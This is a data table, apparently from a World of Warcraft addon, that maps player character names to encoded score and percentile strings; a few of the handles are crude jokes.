["Cvs"] = "EB:582/77%EM:794/85%",
["Noreaga"] = "EB:712/89%LM:969/97%",
["Mulanflu"] = "RM:539/59%",
["Noredemption"] = "SB:825/99%SM:1065/99%",
["Anklecrusher"] = "CB:196/23%UM:428/46%",
["Apsarsis"] = "UB:237/30%RM:479/52%",
["Bhinklul"] = "CB:139/17%RM:527/58%",
["Renegadetoke"] = "UM:363/38%",
["Lonestar"] = "ET:707/89%LB:748/96%EM:893/93%",
["Panthdaddy"] = "EB:653/82%LM:963/97%",
["Boduncadonk"] = "EB:731/92%SM:998/99%",
["Madamadadane"] = "EB:489/76%EM:693/83%",
["Charrlie"] = "CB:71/8%UM:276/28%",
["Eyemback"] = "CM:104/9%",
["Husk"] = "CM:104/10%",
["Repeatgraper"] = "RM:610/67%",
["Docholiday"] = "EB:651/82%EM:920/94%",
["Puppers"] = "EB:520/82%LM:933/97%",
["Milkwalker"] = "UB:228/28%UM:464/48%",
["Vladtwo"] = "EB:656/83%LM:959/97%",
["Aslög"] = "CM:152/14%",
["Öok"] = "RM:485/53%",
["Somthing"] = "EB:685/91%LM:883/96%",
["Spagets"] = "RM:496/55%",
["Cryptojerk"] = "EB:566/78%EM:911/94%",
["Vaati"] = "CM:33/2%",
["Nambia"] = "UB:224/28%CM:14/21%",
["Gachibop"] = "UM:310/40%",
["Bloodshinew"] = "CM:136/19%",
["Biscuithead"] = "CM:26/0%",
["Trebuchet"] = "UM:427/43%",
["Stupidnames"] = "UB:28/31%RM:597/65%",
["Reclaim"] = "EB:687/86%EM:799/83%",
["Skinnypos"] = "UB:257/28%EM:723/77%",
["Vlay"] = "UB:331/43%RM:585/64%",
["Okoprah"] = "CM:27/0%",
["Nomo"] = "RB:498/66%EM:723/78%",
["Mmt"] = "CM:93/8%",
["Delicrr"] = "CM:31/1%",
["Shrikes"] = "CB:25/0%CM:228/23%",
["Poppinonx"] = "CB:31/2%",
["Philsta"] = "UM:439/47%",
["Cheeky"] = "UB:202/25%EM:797/84%",
["Theshewhois"] = "RB:527/68%EM:903/90%",
["Tanca"] = "RB:556/71%EM:856/88%",
["Gimmethatass"] = "UB:382/46%RM:599/64%",
["Byggurk"] = "EB:634/80%RM:620/66%",
["Rayth"] = "UB:358/47%UM:381/44%",
["Trinox"] = "RM:658/70%",
["Lìlly"] = "CM:175/17%",
["Babyche"] = "UB:318/41%CM:208/20%",
["Canshoot"] = "RB:383/50%RM:601/66%",
["Wilfred"] = "UB:216/27%EM:891/90%",
["Maru"] = "RB:526/67%RM:598/64%",
["Hellsrevenge"] = "CB:78/9%UM:462/48%",
["Trauem"] = "RB:533/74%EM:715/79%",
["Molmaer"] = "CB:81/8%RM:551/61%",
["Spiculus"] = "CM:106/9%",
["Nokillifarm"] = "CM:145/13%",
["Miniqt"] = "UB:308/34%RM:659/70%",
["Cheekydruid"] = "CM:207/20%",
["Sarutobi"] = "CB:224/24%RM:398/62%",
["Bruskii"] = "UB:195/49%RM:289/57%",
["Kurgen"] = "RB:484/63%EM:761/79%",
["Atrail"] = "EB:624/85%EM:842/90%",
["Ekodas"] = "EB:662/89%EM:841/92%",
["Idiot"] = "UB:364/47%EM:743/80%",
["Krimez"] = "CM:55/7%",
["Aarons"] = "EB:632/80%EM:732/77%",
["Kirino"] = "EB:641/84%LM:976/98%",
["Karrbs"] = "UB:299/33%UM:408/42%",
["Breakz"] = "EB:673/87%EM:858/90%",
["Dirty"] = "EB:538/77%EM:823/91%",
["Salvador"] = "UB:258/28%CM:208/21%",
["Wickedtiny"] = "CM:148/14%",
["Tebow"] = "EB:674/85%EM:786/82%",
["Nilard"] = "RB:507/70%EM:816/88%",
["Alice"] = "RM:433/66%",
["Bearlymadeit"] = "EB:635/87%LM:942/97%",
["Medrano"] = "CB:38/4%CM:102/12%",
["Wiwka"] = "CM:63/5%",
["Scumbagg"] = "CM:227/22%",
["Bose"] = "CM:123/11%",
["Dotexe"] = "UM:465/47%",
["Holyfx"] = "EB:560/77%EM:848/89%",
["Sec"] = "RB:514/67%EM:909/92%",
["Ghalt"] = "CM:50/4%",
["Herrwolf"] = "UB:231/29%EM:773/83%",
["Mixtape"] = "CM:175/17%",
["Malangowl"] = "RB:500/69%EM:731/90%",
["Warglock"] = "UB:291/36%RM:554/57%",
["Thali"] = "EB:565/78%EM:777/82%",
["Fuzzylogic"] = "LB:718/95%LM:898/96%",
["Adnoh"] = "UB:277/35%RM:579/64%",
["Hsuk"] = "LB:778/98%LM:950/98%",
["Hamsam"] = "CM:231/22%",
["Apesquad"] = "CB:117/12%CM:220/22%",
["Jzz"] = "CB:27/0%RM:526/58%",
["Loktarogar"] = "ET:504/83%LB:745/96%LM:960/98%",
["Mannys"] = "CB:49/5%RM:495/51%",
["Drquinzel"] = "UB:357/48%RM:669/73%",
["Soldwraith"] = "CB:59/6%EM:802/83%",
["Whatarogue"] = "UM:349/36%",
["Textme"] = "RM:547/58%",
["Frostshock"] = "EB:720/94%LM:961/98%",
["Lilbursty"] = "CM:33/1%",
["Skateboardin"] = "CB:140/16%RM:572/63%",
["Aphira"] = "CM:118/10%",
["Shamanboi"] = "UM:425/46%",
["Bigchungus"] = "EB:638/81%LM:939/95%",
["Superkhadgar"] = "CM:205/20%",
["Jedro"] = "EB:627/80%EM:826/85%",
["Buckbolts"] = "UM:436/47%",
["Jermzfthealz"] = "CB:147/17%CM:96/7%",
["Spinesever"] = "EB:671/85%LM:965/96%",
["Mollyheal"] = "RB:401/54%UM:376/40%",
["Lilcon"] = "CM:102/9%",
["Rodfarva"] = "CB:96/11%RM:619/66%",
["Acidfx"] = "CB:33/3%UM:309/31%",
["Berkowitz"] = "CB:201/24%UM:368/38%",
["Bromosa"] = "CT:120/20%RB:414/64%RM:506/71%",
["Megahawk"] = "RB:538/71%EM:840/88%",
["Hayaxi"] = "RM:548/59%",
["Nagoska"] = "CB:116/14%RM:563/60%",
["Tovax"] = "CM:39/3%",
["Superlarge"] = "EB:704/89%EM:838/84%",
["Squirtyx"] = "EB:573/79%RM:673/74%",
["Troopersmage"] = "EB:720/92%EM:881/92%",
["Vorge"] = "EB:737/93%LM:992/98%",
["Idotu"] = "RB:570/74%EM:792/82%",
["Hanakana"] = "EB:558/77%EM:737/80%",
["Sylval"] = "EB:664/86%LM:939/95%",
["Aisa"] = "RM:561/60%",
["Razorhawk"] = "RM:353/57%",
["Xiaobai"] = "RB:474/62%EM:789/77%",
["Sharethree"] = "UB:271/34%EM:763/79%",
["Albbis"] = "RM:693/71%",
["Allneed"] = "UM:310/31%",
["Believemirac"] = "RB:448/56%RM:684/73%",
["Stesww"] = "CM:73/7%",
["Skoni"] = "UT:106/39%RB:523/70%EM:576/85%",
["Portalmaker"] = "UB:341/44%EM:788/84%",
["Ouyanghl"] = "RB:533/74%RM:615/68%",
["Pewpewpewz"] = "RB:388/50%RM:626/67%",
["Painlesstree"] = "CB:127/13%RM:490/51%",
["Destelar"] = "CM:151/13%",
["Orcangela"] = "UB:400/48%EM:708/75%",
["Daisyduke"] = "RM:325/59%",
["Carelesswhis"] = "CM:65/5%",
["Shade"] = "LB:756/95%LM:975/98%",
["Dealer"] = "EB:564/75%EM:890/90%",
["Court"] = "UB:225/28%UM:418/45%",
["Gundras"] = "UM:327/33%",
["Jennacide"] = "CM:26/0%",
["Tuck"] = "RB:456/60%EM:795/85%",
["Frostyballz"] = "CM:180/17%",
["Seroth"] = "UB:270/34%RM:553/59%",
["Koshibolt"] = "RB:514/67%RM:616/64%",
["Thaz"] = "UM:459/47%",
["Toque"] = "CM:102/9%",
["Divna"] = "CM:51/3%",
["Trashil"] = "RB:458/63%EM:693/76%",
["Stahrlight"] = "EB:628/86%RM:666/73%",
["Mancub"] = "UB:101/43%RM:175/54%",
["Archives"] = "EM:253/82%",
["Llnk"] = "UM:256/26%",
["Smoka"] = "EB:638/87%EM:620/86%",
["Selenagomez"] = "RB:429/53%RM:633/68%",
["Namasile"] = "RB:530/70%EM:852/89%",
["Noctua"] = "RM:497/54%",
["Mees"] = "UM:377/40%",
["Drlee"] = "CB:43/4%UM:320/33%",
["Shothunter"] = "RB:445/58%RM:703/67%",
["Saintconpaul"] = "RB:486/67%RM:679/74%",
["Wilkey"] = "UB:379/45%RM:678/72%",
["Yáhweh"] = "UB:248/31%UM:387/39%",
["Youboo"] = "RB:454/62%EM:721/76%",
["Aoneco"] = "EM:599/78%",
["Makudo"] = "RM:681/72%",
["Forsakenhand"] = "CB:46/3%EM:855/90%",
["Critable"] = "CM:98/9%",
["Plainchoco"] = "RB:428/56%RM:640/70%",
["Rc"] = "EB:622/85%EM:759/88%",
["Randee"] = "CB:26/0%UM:256/26%",
["Hairbreath"] = "UT:385/47%EB:549/78%RM:538/63%",
["Waitforsundr"] = "UM:304/30%",
["Bitok"] = "LB:722/95%EM:753/82%",
["Darknano"] = "RB:350/64%EM:616/79%",
["Hatfield"] = "UB:246/26%RM:504/53%",
["Gioss"] = "RB:379/50%RM:471/51%",
["Pantyraid"] = "UB:236/25%CM:89/11%",
["Zercy"] = "UM:256/26%",
["Burnitall"] = "CB:50/5%UM:310/32%",
["Feårløcked"] = "RB:569/74%EM:743/77%",
["Anddy"] = "CB:29/1%CM:225/22%",
["Fanmoi"] = "CB:117/14%UM:284/29%",
["Dondris"] = "CB:32/2%UM:327/32%",
["Sazuke"] = "RB:513/65%EM:752/79%",
["Cylenlocked"] = "UB:337/43%RM:630/65%",
["Yamikaze"] = "LB:769/98%LM:963/98%",
["Drizzydre"] = "UB:295/38%EM:909/92%",
["Dabaober"] = "RB:415/51%RM:569/61%",
["Fashendav"] = "UB:308/40%RM:611/67%",
["Scruby"] = "RB:506/64%EM:793/76%",
["Inukenshin"] = "LT:749/95%EB:717/93%LM:960/98%",
["Muffmeplz"] = "UM:306/31%",
["Czh"] = "CB:164/19%RM:499/53%",
["Butterflyren"] = "EB:593/75%EM:893/92%",
["Donnydarko"] = "RB:396/53%RM:569/61%",
["Severence"] = "CM:61/9%",
["Nef"] = "EB:605/77%EM:773/81%",
["Healzomg"] = "UB:337/45%RM:706/73%",
["Moolahn"] = "EB:606/83%EM:756/87%",
["Voodoowrath"] = "EB:651/88%EM:707/89%",
["Crazyeyes"] = "UB:257/28%UM:458/48%",
["Priestalt"] = "UB:359/48%RM:573/63%",
["Appendix"] = "EB:693/92%EM:861/90%",
["Cocakoala"] = "EB:635/83%RM:673/74%",
["Slummber"] = "CB:189/23%RM:506/53%",
["Athrix"] = "RB:456/59%EM:823/82%",
["Liqr"] = "CM:89/7%",
["Flemtality"] = "UB:357/42%RM:609/65%",
["Vassilly"] = "EB:618/78%EM:919/94%",
["Scarrahl"] = "EB:605/77%EM:942/94%",
["Ceredwen"] = "EB:605/83%EM:872/91%",
["Thisperia"] = "RB:453/59%EM:806/84%",
["Mddsteve"] = "EB:634/87%EM:787/86%",
["Nothíng"] = "UM:287/29%",
["Mahfa"] = "EB:622/88%LM:974/98%",
["Cocodoco"] = "EB:605/89%SM:1006/99%",
["Gamarth"] = "CM:75/6%",
["Zaitsev"] = "RM:505/53%",
["Goodlinga"] = "EB:711/94%EM:834/89%",
["Halfpint"] = "RB:482/61%EM:775/81%",
["Teraclon"] = "EB:597/78%EM:903/92%",
["Bulldohz"] = "LB:760/98%LM:939/97%",
["Ârmd"] = "EB:600/83%EM:805/90%",
["Mddstefan"] = "RM:532/58%",
["Silviera"] = "CB:201/24%UM:273/28%",
["Mopal"] = "UM:342/36%",
["Trihugger"] = "EB:634/86%EM:777/89%",
["Impetus"] = "CB:90/19%EM:579/77%",
["Gimppy"] = "EB:708/94%EM:834/87%",
["Vanqueeph"] = "UM:256/26%",
["Prayforskoob"] = "CB:90/9%UM:381/41%",
["Gunnan"] = "EB:550/81%LM:906/95%",
["Coneofcold"] = "RB:554/73%EM:892/90%",
["Redtgp"] = "RB:543/72%EM:807/86%",
["Studboy"] = "RM:487/53%",
["Shekz"] = "CB:230/24%RM:547/58%",
["Humanfemale"] = "UB:265/34%CM:105/9%",
["Ckckam"] = "RB:468/64%EM:757/81%",
["Hawalawa"] = "UB:317/41%RM:633/69%",
["Timebear"] = "CT:31/1%UB:46/32%UM:271/32%",
["Dairykween"] = "CM:64/4%",
["Sooba"] = "UM:407/44%",
["Tm"] = "UB:47/26%UM:47/41%",
["Rachelmadcow"] = "EM:586/79%",
["Moartality"] = "RB:577/73%EM:754/79%",
["Wotmonger"] = "EB:648/82%EM:883/91%",
["Saunyah"] = "EB:689/93%LM:932/97%",
["Harriette"] = "UB:355/47%RM:621/69%",
["Flaco"] = "CM:74/6%",
["Worakls"] = "EB:634/83%RM:682/74%",
["Beeboo"] = "UB:287/32%RM:567/61%",
["Itzboomy"] = "CM:199/19%",
["Murgo"] = "EB:598/79%EM:893/92%",
["Finesse"] = "EB:649/85%EM:890/92%",
["Fleshwallet"] = "RB:498/64%EM:801/83%",
["Guchi"] = "CB:81/7%UM:263/35%",
["Avinizm"] = "CM:167/16%",
["Mikehunty"] = "UM:296/29%",
["Eulogy"] = "UM:385/41%",
["Milkwand"] = "RB:385/53%UM:330/34%",
["Epiphyllum"] = "UB:393/49%RM:599/64%",
["Holydawn"] = "UB:351/47%UM:436/47%",
["Smooth"] = "UB:223/28%UM:455/49%",
["Wawaweewa"] = "CB:133/16%CM:61/4%",
["Blackfury"] = "RM:309/50%",
["Biles"] = "RB:556/72%EM:834/86%",
["Tjie"] = "RM:468/73%",
["Illidarie"] = "CM:188/19%",
["Punny"] = "RB:427/52%RM:627/67%",
["Laufey"] = "RB:562/74%RM:658/72%",
["Bluebeats"] = "RM:190/56%",
["Koshi"] = "EB:735/92%LM:994/98%",
["Dirtyydan"] = "CB:153/18%UM:311/32%",
["Rioja"] = "CB:171/21%UM:344/36%",
["Phoenixbro"] = "CB:104/12%RM:534/58%",
["Mannymo"] = "RB:517/66%EM:738/78%",
["Mashinka"] = "RB:434/54%UM:297/30%",
["Saauce"] = "UB:354/47%EM:811/86%",
["Komadayah"] = "UB:242/31%RM:585/64%",
["Ancientrick"] = "RB:461/61%RM:539/59%",
["Xiaoxiannv"] = "CM:26/0%",
["Botholomere"] = "UB:320/36%UM:385/39%",
["Woahmg"] = "CT:33/7%RB:422/52%RM:590/63%",
["Jerkk"] = "CB:153/16%CM:100/12%",
["Pogdogg"] = "CM:229/22%",
["Cynics"] = "CM:109/15%",
["Raury"] = "CB:166/17%CM:244/24%",
["Hicupriest"] = "CB:180/21%",
["Shadowboxin"] = "EB:708/90%EM:895/92%",
["Emersyn"] = "EB:593/78%EM:713/77%",
["Divineveil"] = "EB:605/83%EM:856/91%",
["Iggy"] = "RB:440/56%RM:583/62%",
["Toppshot"] = "CM:196/18%",
["Shhteve"] = "EB:642/87%EM:790/89%",
["Cyberfriend"] = "RB:570/73%EM:782/81%",
["Blackened"] = "RB:496/63%RM:701/74%",
["Paprika"] = "EB:643/83%EM:895/92%",
["Weinerthezon"] = "EB:588/77%EM:829/86%",
["Nis"] = "RB:466/58%EM:790/83%",
["Cmt"] = "CB:110/13%RM:475/52%",
["Crabgoesoink"] = "RB:501/65%EM:720/75%",
["Orcorz"] = "UB:297/33%UM:462/48%",
["Twilightwind"] = "CB:105/11%EM:632/77%",
["Nefariaan"] = "RB:497/65%EM:767/80%",
["Charlievan"] = "EB:586/80%EM:750/81%",
["Soral"] = "CB:42/4%RM:528/56%",
["Shamshot"] = "EB:631/86%EM:890/92%",
["Klumpp"] = "CB:36/4%RM:560/60%",
["Cuthroatflo"] = "CB:132/16%RM:632/67%",
["Windseek"] = "CM:77/6%",
["Geodon"] = "CB:72/13%EM:673/83%",
["Protofrost"] = "CM:34/1%",
["Randomchance"] = "UM:332/34%",
["Sonnik"] = "CB:177/21%RM:500/53%",
["Plas"] = "CM:107/12%",
["Kaizensama"] = "UM:185/39%",
["Demondude"] = "UB:285/36%UM:326/33%",
["Konsmash"] = "EB:653/82%EM:936/94%",
["Darkheals"] = "CM:231/22%",
["Chanh"] = "UM:333/33%",
["Bumblebb"] = "EB:659/83%EM:931/94%",
["Tremortotem"] = "UB:137/45%EM:737/81%",
["Rockoh"] = "UB:281/31%UM:459/48%",
["Exshot"] = "EB:658/86%EM:823/87%",
["Silvanus"] = "EB:643/87%RM:689/72%",
["Drmoreau"] = "RB:459/63%EM:682/81%",
["Hnglkbull"] = "CB:159/18%UM:279/28%",
["Rdzerem"] = "CM:32/2%",
["Bearries"] = "RM:437/71%",
["Worrii"] = "CM:60/8%",
["Shonion"] = "EB:471/89%EM:735/83%",
["Dyingheals"] = "UB:235/29%EM:781/85%",
["Lonewolves"] = "CM:183/17%",
["Shlongbeard"] = "UB:244/31%RM:621/69%",
["Nondescript"] = "CB:45/5%CM:160/17%",
["Goska"] = "CB:69/8%RM:514/54%",
["Brunhealda"] = "RB:491/68%EM:800/87%",
["Luckybee"] = "CB:121/14%EM:918/93%",
["Trojanz"] = "RM:610/67%",
["Shokem"] = "CB:66/7%UM:381/40%",
["Sindera"] = "CB:72/8%RM:575/61%",
["Oombastic"] = "EB:679/93%LM:923/98%",
["Moogie"] = "CM:157/14%",
["Ralliss"] = "CB:84/9%",
["Zazriel"] = "RB:459/57%EM:776/81%",
["Kunthuntr"] = "CM:51/3%",
["Skip"] = "RB:442/58%EM:877/91%",
["Mynro"] = "CB:136/14%CM:95/11%",
["Nas"] = "RB:457/63%RM:603/66%",
["Vencent"] = "EB:623/85%EM:665/82%",
["Burnst"] = "RT:145/50%RB:455/65%EM:823/86%",
["Axul"] = "UM:256/26%",
["Yamobethere"] = "EB:550/79%LM:947/95%",
["Baradram"] = "UB:315/35%EM:730/77%",
["Spellbind"] = "EB:661/86%EM:899/93%",
["Luticius"] = "RM:498/51%",
["Aldozat"] = "UM:407/41%",
["Anoxic"] = "EB:684/88%LM:936/96%",
["Shanksa"] = "UB:390/49%EM:742/78%",
["Xeek"] = "EB:602/79%EM:882/90%",
["Gregoriolee"] = "CB:99/11%UM:461/48%",
["Zangusuu"] = "EB:701/89%LM:930/95%",
["Kururuberuru"] = "RB:485/64%EM:722/76%",
["Drakiir"] = "RB:557/71%EM:898/92%",
["Namesrhard"] = "EB:637/82%EM:884/90%",
["Daftdog"] = "EB:643/87%LM:908/95%",
["Onionrangz"] = "UB:188/36%EM:703/85%",
["Silviajdm"] = "EB:676/91%LM:975/98%",
["Drakaer"] = "RM:543/60%",
["Julyus"] = "UB:330/38%RM:694/74%",
["Hashies"] = "EB:693/89%LM:960/97%",
["Lryvlns"] = "EB:634/87%LM:963/98%",
["Chebbz"] = "UB:383/48%EM:727/77%",
["Pepperjack"] = "EB:607/84%LM:860/95%",
["Boi"] = "RB:474/63%EM:852/89%",
["Bubblerun"] = "RB:536/74%EM:805/86%",
["Cyberwar"] = "UM:461/48%",
["Sevaiver"] = "UM:255/26%",
["Nínja"] = "RB:550/70%EM:884/90%",
["Entissnake"] = "CM:61/9%",
["Webetankin"] = "EB:608/80%EM:900/89%",
["Noqx"] = "EB:650/88%EM:552/75%",
["Crazydwarf"] = "EB:560/77%EM:704/77%",
["Speez"] = "RB:513/65%EM:887/88%",
["Trime"] = "CB:39/4%UM:381/38%",
["Amitofo"] = "CM:94/8%",
["Lithium"] = "UB:269/35%UM:100/49%",
["Opencasket"] = "UB:228/28%RM:624/69%",
["Blaid"] = "UM:307/32%",
["Coffeemug"] = "EB:715/90%SM:1009/99%",
["Aflo"] = "LB:722/96%LM:786/97%",
["Pouroneout"] = "CM:64/5%",
["Arrowhead"] = "CB:88/10%CM:63/9%",
["Winstomp"] = "EB:633/86%EM:795/85%",
["Methcoil"] = "CM:72/7%",
["Ragnark"] = "CB:225/24%RM:552/59%",
["Denakina"] = "CB:27/1%",
["Pidgeotto"] = "EB:620/84%LM:937/98%",
["Amoramor"] = "UB:228/27%RM:705/67%",
["Lausten"] = "LB:771/98%LM:973/98%",
["Ironclaw"] = "RB:265/65%RM:459/73%",
["Michop"] = "CM:81/7%",
["Grubbly"] = "CB:46/5%CM:70/9%",
["Monomate"] = "UB:280/36%RM:594/66%",
["Johnjibbers"] = "LT:548/96%EB:558/79%RM:499/58%",
["Bowtbruh"] = "RB:366/65%EM:760/88%",
["Babydots"] = "CB:27/1%CM:171/17%",
["Luvstosploog"] = "CB:71/8%CM:120/18%",
["Ioyal"] = "UB:362/46%EM:744/77%",
["Navador"] = "UB:345/46%UM:55/42%",
["Zedorno"] = "UB:307/38%RM:513/54%",
["Zig"] = "UB:255/33%UM:330/34%",
["Thiccysmallz"] = "RM:687/71%",
["Shankyounoob"] = "UB:382/48%RM:496/53%",
["Cephis"] = "CM:90/9%",
["Helga"] = "RB:417/57%EM:686/76%",
["Tzenjin"] = "RB:456/62%EM:683/81%",
["Nariel"] = "EB:559/77%RM:584/65%",
["Dimtrii"] = "CM:199/19%",
["Choku"] = "RB:531/67%RM:626/67%",
["Decals"] = "CM:109/9%",
["Crydina"] = "CM:35/2%",
["Honeyhole"] = "RB:419/57%RM:588/65%",
["Skrillas"] = "EB:736/94%SM:965/99%",
["Shellbullet"] = "CM:67/6%",
["Micronova"] = "CM:64/9%",
["Tinibish"] = "UB:332/42%RM:514/53%",
["Tricks"] = "EB:597/82%EM:786/82%",
["Balsogna"] = "CB:150/17%CM:147/22%",
["Osg"] = "CM:167/17%",
["Warz"] = "RB:508/67%EM:801/83%",
["Puffies"] = "EB:681/92%LM:902/95%",
["Shiftzilla"] = "LB:772/98%RM:475/52%",
["Gravewizard"] = "UB:231/25%UM:336/34%",
["Veganprep"] = "RB:549/72%RM:562/58%",
["Izitnu"] = "RB:532/74%UM:328/34%",
["Eatmyfrost"] = "CM:140/13%",
["Papij"] = "RB:515/66%RM:663/71%",
["Phhteven"] = "UB:51/36%UM:34/32%",
["Amarskipops"] = "EB:579/86%LM:955/98%",
["Creepygoat"] = "EB:600/78%EM:813/81%",
["Spoõn"] = "EB:606/80%LM:954/97%",
["Djhauntz"] = "UB:316/41%EM:762/83%",
["Camerok"] = "RB:533/74%EM:694/76%",
["Lupy"] = "RB:514/71%EM:758/83%",
["Nistic"] = "LB:738/97%LM:903/97%",
["Pej"] = "RB:536/71%EM:773/83%",
["Shinosai"] = "RB:543/70%EM:914/93%",
["Caharin"] = "EB:649/84%LM:965/97%",
["Lornarcos"] = "EB:615/80%EM:889/91%",
["Rite"] = "CM:152/13%",
["Buckbumble"] = "UB:279/36%RM:641/70%",
["Kommon"] = "UM:379/38%",
["Huxz"] = "UB:330/44%RM:467/51%",
["Orcpenguin"] = "RB:506/64%EM:903/92%",
["Detach"] = "EB:664/85%EM:915/94%",
["Zyos"] = "RB:427/58%RM:517/57%",
["Sunnysi"] = "CB:94/11%CM:239/24%",
["Gulzahn"] = "RB:489/68%RM:709/73%",
["Mustafa"] = "EB:639/81%LM:962/96%",
["Synide"] = "EB:619/80%LM:943/95%",
["Kyreck"] = "EB:712/93%SM:1005/99%",
["Volcanoes"] = "RB:517/69%LM:924/95%",
["Lenoxpwns"] = "CB:176/21%RM:753/73%",
["Bluehair"] = "RB:509/64%EM:911/93%",
["Ginyuforce"] = "RB:458/57%EM:917/94%",
["Jordxyz"] = "EB:519/79%EM:878/94%",
["Darkvein"] = "UB:259/31%EM:830/86%",
["Bia"] = "EB:580/81%LM:898/95%",
["Nidorous"] = "RB:518/68%EM:801/83%",
["Shadowjmp"] = "EB:595/78%LM:931/95%",
["Donforest"] = "EB:614/78%LM:964/97%",
["Frostnova"] = "EB:593/78%EM:780/83%",
["Chanse"] = "EB:622/79%LM:948/96%",
["Loklok"] = "CB:143/17%UM:337/34%",
["Yamaro"] = "EB:602/78%EM:799/83%",
["Grimstein"] = "UB:368/43%RM:553/59%",
["Fishs"] = "CB:154/18%UM:290/29%",
["Dimmuh"] = "CM:90/7%",
["Crayonkun"] = "CM:110/10%",
["Dameanestorc"] = "CM:48/6%",
["Clownbaby"] = "CM:191/19%",
["Futurespliff"] = "EB:578/76%EM:869/91%",
["Charp"] = "RB:565/72%EM:853/88%",
["Leonn"] = "EB:733/94%SM:978/99%",
["Joskre"] = "RB:521/66%EM:933/93%",
["Tatercannon"] = "CB:56/5%EM:692/75%",
["Raizeal"] = "RB:400/52%RM:605/64%",
["Mysticel"] = "UB:163/47%RM:446/67%",
["Crackersx"] = "UB:267/32%EM:799/77%",
["Jawah"] = "CM:26/0%",
["Dpszing"] = "CB:60/6%UM:374/40%",
["Galtero"] = "UB:338/39%EM:732/77%",
["Guerita"] = "LT:809/95%LB:727/96%SM:984/99%",
["Vanishh"] = "RB:461/59%RM:581/62%",
["Fixit"] = "UM:267/27%",
["Boboturk"] = "CM:122/11%",
["Trumpqtrain"] = "CB:60/7%UM:311/31%",
["Phurry"] = "UB:223/27%UM:348/37%",
["Apacho"] = "UB:283/36%EM:723/79%",
["Bn"] = "RB:578/74%EM:888/91%",
["Snowmizer"] = "CM:63/4%",
["Swiftshooter"] = "UB:262/32%EM:721/76%",
["Khang"] = "EB:689/91%LM:926/95%",
["Xrw"] = "CB:130/16%RM:656/72%",
["Andy"] = "EB:682/86%EM:926/94%",
["Mana"] = "EB:670/87%EM:819/83%",
["Moostermind"] = "RM:522/58%",
["Mandingó"] = "EM:832/91%",
["Gopnik"] = "EB:614/84%EM:882/92%",
["Hamlinz"] = "UM:466/49%",
["Wifiwizard"] = "UB:359/47%LM:943/95%",
["Wookoong"] = "RM:499/53%",
["Biggayal"] = "CM:60/5%",
["Shadowbaiter"] = "UM:435/44%",
["Multishot"] = "UT:75/29%RB:535/70%RM:625/67%",
["Superpayday"] = "CM:53/3%",
["Panicroom"] = "RM:406/63%",
["Enemy"] = "EB:609/78%LM:987/98%",
["Might"] = "EB:706/92%LM:934/98%",
["Lilganjaboy"] = "UB:291/36%EM:811/84%",
["Spanksya"] = "UB:229/29%UM:380/46%",
["Uraji"] = "EB:570/79%LM:900/95%",
["Myspace"] = "EB:661/86%LM:928/95%",
["Loverc"] = "UB:42/41%",
["Amandrise"] = "UB:330/41%RM:531/57%",
["Usjournalist"] = "UB:329/40%UM:330/34%",
["Boboskii"] = "RM:631/66%",
["Inshot"] = "CM:43/5%",
["Wileyz"] = "CT:35/5%RB:514/71%EM:743/81%",
["Addrago"] = "RB:572/73%EM:716/76%",
["Console"] = "EB:618/85%EM:796/86%",
["Solstica"] = "CM:30/1%",
["Vulk"] = "RB:570/73%EM:873/89%",
["Butterbee"] = "UB:365/43%EM:721/76%",
["Pinkontop"] = "CM:117/12%",
["Mozz"] = "UB:352/41%EM:774/81%",
["Juicexxy"] = "UB:248/27%RM:478/50%",
["Vouch"] = "LB:763/97%LM:917/95%",
["Shivalrydead"] = "UM:342/35%",
["Dmfarm"] = "UM:293/28%",
["Masochistic"] = "CB:174/21%",
["Moobran"] = "UM:384/39%",
["Spudmuffin"] = "CB:87/10%RM:679/64%",
["Shadowlore"] = "CB:188/22%CM:97/7%",
["Snaz"] = "EB:691/88%EM:838/86%",
["Escapeh"] = "RB:532/68%",
["Beyonce"] = "CM:176/18%",
["Abbey"] = "LT:498/97%EB:724/94%EM:616/94%",
["Tacomann"] = "CM:197/19%",
["Dalid"] = "UB:260/32%UM:256/26%",
["Shìft"] = "RM:473/52%",
["Sidorenko"] = "CB:84/9%",
["Eschewter"] = "EB:666/85%EM:865/89%",
["Wombo"] = "SM:990/99%",
["Pricklypear"] = "RB:431/55%EM:851/84%",
["Salazaar"] = "EB:555/77%EM:913/94%",
["Yerded"] = "UB:213/26%RM:576/61%",
["Naleakington"] = "RM:334/62%",
["Scrappin"] = "UB:266/29%UM:438/45%",
["Rasalghul"] = "CM:73/6%",
["Ripsef"] = "CM:89/9%",
["Darcain"] = "CM:75/8%",
["Rageahol"] = "UM:499/46%",
["Socîalism"] = "CB:34/2%CM:168/15%",
["Shiesty"] = "CB:55/5%UM:455/48%",
["Heislegend"] = "RB:583/74%EM:911/93%",
["Joskiwoski"] = "UM:450/47%",
["Aristoñ"] = "CM:52/3%",
["Colalin"] = "RB:474/65%EM:753/80%",
["Atin"] = "RB:516/71%EM:827/88%",
["Heavenacero"] = "CB:185/22%RM:557/60%",
["Scotos"] = "EB:590/77%EM:847/87%",
["Vizit"] = "EB:646/84%EM:850/89%",
["Conviz"] = "RB:536/68%EM:842/82%",
["Witheredsoul"] = "CB:96/11%UM:302/30%",
["Noodlemaker"] = "UB:332/44%RM:568/63%",
["Noonecares"] = "RM:502/55%",
["Çlaymore"] = "CB:198/24%RM:661/72%",
["Executïe"] = "CM:149/16%",
["Rikazi"] = "CB:132/16%UM:440/46%",
["Lorblade"] = "UM:253/25%",
["Veilin"] = "CB:185/20%RM:438/50%",
["Taihen"] = "CM:99/8%",
["Peren"] = "CB:157/16%UM:364/37%",
["Amberose"] = "CM:99/8%",
["Gêralt"] = "UB:241/26%UM:295/29%",
["Faceless"] = "RM:518/55%",
["Lapdcop"] = "EB:714/90%LM:954/96%",
["Ranglac"] = "RB:419/57%EM:713/78%",
["Ogpacks"] = "UM:425/46%",
["Silàs"] = "EB:556/82%EM:698/82%",
["Skankyginger"] = "RB:578/74%EM:843/87%",
["Thriel"] = "EB:408/75%RM:359/68%",
["Frozone"] = "RB:533/71%EM:696/76%",
["Selock"] = "CM:70/10%",
["Thehealbot"] = "UM:323/34%",
["Tednugget"] = "UM:266/25%",
["Ratic"] = "CM:216/21%",
["Hàdes"] = "RB:529/67%RM:694/74%",
["Gobsmack"] = "UM:208/40%",
["Wintertime"] = "CM:152/14%",
["Schrutê"] = "UB:387/49%EM:769/80%",
["Achron"] = "RM:607/65%",
["Tamako"] = "CB:93/9%CM:174/16%",
["Darkmoonwu"] = "RB:389/50%UM:350/35%",
["Grandcaster"] = "UM:359/38%",
["Sabersama"] = "UB:320/36%UM:342/34%",
["Memeda"] = "EB:662/86%EM:756/81%",
